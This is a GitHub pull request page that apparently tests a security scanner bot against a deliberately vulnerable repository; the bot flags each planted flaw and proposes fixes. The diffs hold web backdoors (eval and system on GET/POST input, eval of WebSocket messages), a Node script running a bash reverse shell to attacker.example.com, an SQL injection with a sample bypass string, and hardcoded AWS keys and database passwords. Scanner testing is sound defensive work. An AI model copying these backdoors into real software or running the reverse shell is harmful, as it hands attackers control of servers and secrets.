Yay #15
Yay #15
Conversation
Pr merge test
![zeropath-ai-staging[bot]](https://avatars.githubusercontent.com/in/1190428?s=60&v=4){kind=small}
|
|
||
|
|
||
|
|
||
| eval($_GET["XSS"]); | ||
|
|
||
|
|
||
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | ||
|
|
||
|
|
||
| system($_GET["cmd"]); | ||
|
|
||
|
|
||
| /* |
There was a problem hiding this comment.
Critical RCE Vulnerability in upload.php via eval() and system() (Severity: HIGH)
This code is vulnerable to remote code execution, allowing attackers to execute arbitrary commands on the server. The upload.php script directly uses eval($_GET["XSS"]) and system($_GET["cmd"]), which causes any code provided in the XSS or cmd URL parameters to be executed with the privileges of the web server user. This critical vulnerability allows complete compromise of the server.
View details in ZeroPath
| eval($_GET["XSS"]); | |
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | |
| system($_GET["cmd"]); | |
| /* | |
| // Removed insecure use of eval — user-supplied code execution is forbidden | |
| if (isset($_GET["XSS"])) { | |
| error_log("Blocked dangerous eval attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown")); | |
| http_response_code(400); | |
| echo "Invalid request"; | |
| exit; | |
| } | |
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | |
| // Removed insecure use of system — executing arbitrary commands is forbidden | |
| if (isset($_GET["cmd"])) { | |
| error_log("Blocked dangerous system() attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown")); | |
| http_response_code(400); | |
| echo "Invalid request"; | |
| exit; | |
| } | |
| /* |
| echo "<h>" .$_GET["search"]. "</h>"; | ||
|
|
||
|
|
||
| exec($_POST["exec"]); |
There was a problem hiding this comment.
Remote Code Execution via Unsanitized Input in index.php (Severity: HIGH)
The application is vulnerable to remote code execution. Specifically, the exec function in index.php (lines 3-6) executes the contents of the $_POST["exec"] parameter, which allows attackers to run arbitrary system commands. This can lead to complete server compromise.
View details in ZeroPath
| echo "<h>" .$_GET["search"]. "</h>"; | |
| exec($_POST["exec"]); | |
| echo "<h>" .$_GET["search"]. "</h>"; | |
| // Block remote command execution to prevent RCE. | |
| $__blocked_exec = $_POST['exec'] ?? ''; | |
| if ($__blocked_exec !== '') { | |
| error_log('Blocked attempt to execute command via POST[exec]: ' . substr($__blocked_exec, 0, 200)); | |
| } | |
| echo 'Command execution via web is disabled for security reasons.'; |
| // RCE | ||
| wss.on('connection', ws => { | ||
| ws.on('message', msg => { | ||
| eval(msg); | ||
| ws.send('Executed: ' + msg); | ||
| }); | ||
| }); |
There was a problem hiding this comment.
RCE Vulnerability via Unsanitized WebSocket Message in ws/index.js (Severity: HIGH)
This vulnerability allows for remote code execution (RCE) because unsanitized messages received via the WebSocket in ws/index.js are directly passed to the eval() function. Specifically, the ws.on('message', msg => { eval(msg); ... }); block on lines 1-12 takes the incoming message without validation, which causes arbitrary JavaScript code to be executed on the server. An attacker could exploit this to gain complete control of the system.
View details in ZeroPath
| // RCE | |
| wss.on('connection', ws => { | |
| ws.on('message', msg => { | |
| eval(msg); | |
| ws.send('Executed: ' + msg); | |
| }); | |
| }); | |
| // RCE | |
| wss.on('connection', ws => { | |
| ws.on('message', msg => { | |
| // Block direct eval of incoming messages to mitigate RCE | |
| try { | |
| // Expect JSON messages with { action: 'echo', data: '...' } | |
| const parsed = JSON.parse(msg); | |
| if (parsed && parsed.action === 'echo') { | |
| ws.send('Echo: ' + String(parsed.data)); | |
| } else { | |
| ws.send('Rejected: unsupported or unsafe message format'); | |
| } | |
| } catch (e) { | |
| // Not JSON - reject instead of executing | |
| ws.send('Rejected: messages must be JSON with an allowed action'); | |
| } | |
| ws.send('Executed: ' + msg); | |
| }); | |
| }); |
| const { exec } = require('child_process'); | ||
|
|
||
| const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; | ||
|
|
||
| console.log('[*] Executing reverse shell payload…'); | ||
| exec(payload, (err, stdout, stderr) => { | ||
| if (err) { | ||
| console.error('[!] Error executing payload:', err); | ||
| return; | ||
| } | ||
| console.log('[+] Payload executed. stdout:', stdout); | ||
| }); |
There was a problem hiding this comment.
Hardcoded Reverse Shell Backdoor in stdin/index.js (Severity: HIGH)
The application contains a hardcoded reverse shell payload within the stdin/index.js file, lines 1-12, creating a significant security risk. Specifically, the payload variable contains a bash command that, when executed via exec, attempts to establish a reverse shell connection to attacker.example.com on port 4444. This would allow an attacker to gain unauthorized remote access to the system if the code is ever executed.
View details in ZeroPath
| const { exec } = require('child_process'); | |
| const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; | |
| console.log('[*] Executing reverse shell payload…'); | |
| exec(payload, (err, stdout, stderr) => { | |
| if (err) { | |
| console.error('[!] Error executing payload:', err); | |
| return; | |
| } | |
| console.log('[+] Payload executed. stdout:', stdout); | |
| }); | |
| /* | |
| * Security fix: Removed hardcoded reverse shell payload. | |
| * The previous implementation executed a reverse shell command which is a critical security risk. | |
| * This module now provides a safe stub. Implement secure behavior as needed. | |
| */ | |
| console.error('[!] Security: removed hardcoded reverse shell payload. No action taken.'); | |
| module.exports = { | |
| executePayload: () => { | |
| // Intentionally no-op to avoid executing arbitrary commands. | |
| return Promise.resolve({ result: 'blocked' }); | |
| } | |
| }; |
|
|
||
| /* | ||
| [default] | ||
| aws_access_key_id = AKIA2T2SJH6M76LT25T4 |
There was a problem hiding this comment.
Hardcoded AWS Credentials in upload.php (Severity: CRITICAL)
Compromised AWS credentials can lead to unauthorized access to cloud resources, potentially resulting in data breaches and service disruption. The file upload.php contains hardcoded AWS access key ID (AKIA2T2SJH6M76LT25T4) and secret access key (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) on line 17, which allows anyone with access to the file to manage AWS resources associated with the compromised account. This exposure allows attackers to perform actions within the AWS environment, such as accessing data in S3 buckets or launching EC2 instances.
View details in ZeroPath
| <?php | ||
|
|
||
| function login($username, $password) { | ||
| // Configuration | ||
| $db_host = 'localhost'; | ||
| $db_username = 'root'; | ||
| $db_password = 'root@1234'; | ||
| $db_name = 'arnicaTest'; | ||
|
|
||
|
|
||
| // Connect to database | ||
| $conn = new mysqli($db_host, $db_username, $db_password, $db_name); | ||
|
|
||
| // Check connection | ||
| if ($conn->connect_error) { | ||
| die("Connection failed: ". $conn->connect_error); | ||
| } | ||
|
|
||
| // admin | ||
| // gdhas' OR 1=1 # | ||
|
|
||
| // Query database | ||
| $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; | ||
|
|
||
| $result = $conn->query($query); | ||
|
|
||
| // Check if user exists | ||
| if ($result->num_rows > 0) { | ||
| echo "Welcome, $username!"; | ||
| } else { | ||
| echo "$query Invalid username or password."; | ||
| } | ||
|
|
||
| // Close connection | ||
| $conn->close(); | ||
| }<?php | ||
|
|
||
|
|
||
| $username = $_POST['username']; | ||
| $password = $_POST['password']; | ||
| login($username, $password); | ||
| ?> |
There was a problem hiding this comment.
SQL Injection Vulnerability in test.php (Severity: HIGH)
A SQL injection vulnerability exists in test.php, allowing attackers to potentially read or modify sensitive data. Specifically, the login function in test.php directly incorporates the $username and $password POST parameters into an SQL query without proper sanitization or parameterization, which causes arbitrary SQL code to be executed. An attacker could inject malicious SQL code via the username or password fields, leading to unauthorized data access or modification.
View details in ZeroPath
|
❌ Possible security or compliance issues detected. Reviewed everything up to bb2dea1. The following issues were found:
Security Overview
Detected Code Changes
Reply to this PR with |
3 participants
No description provided.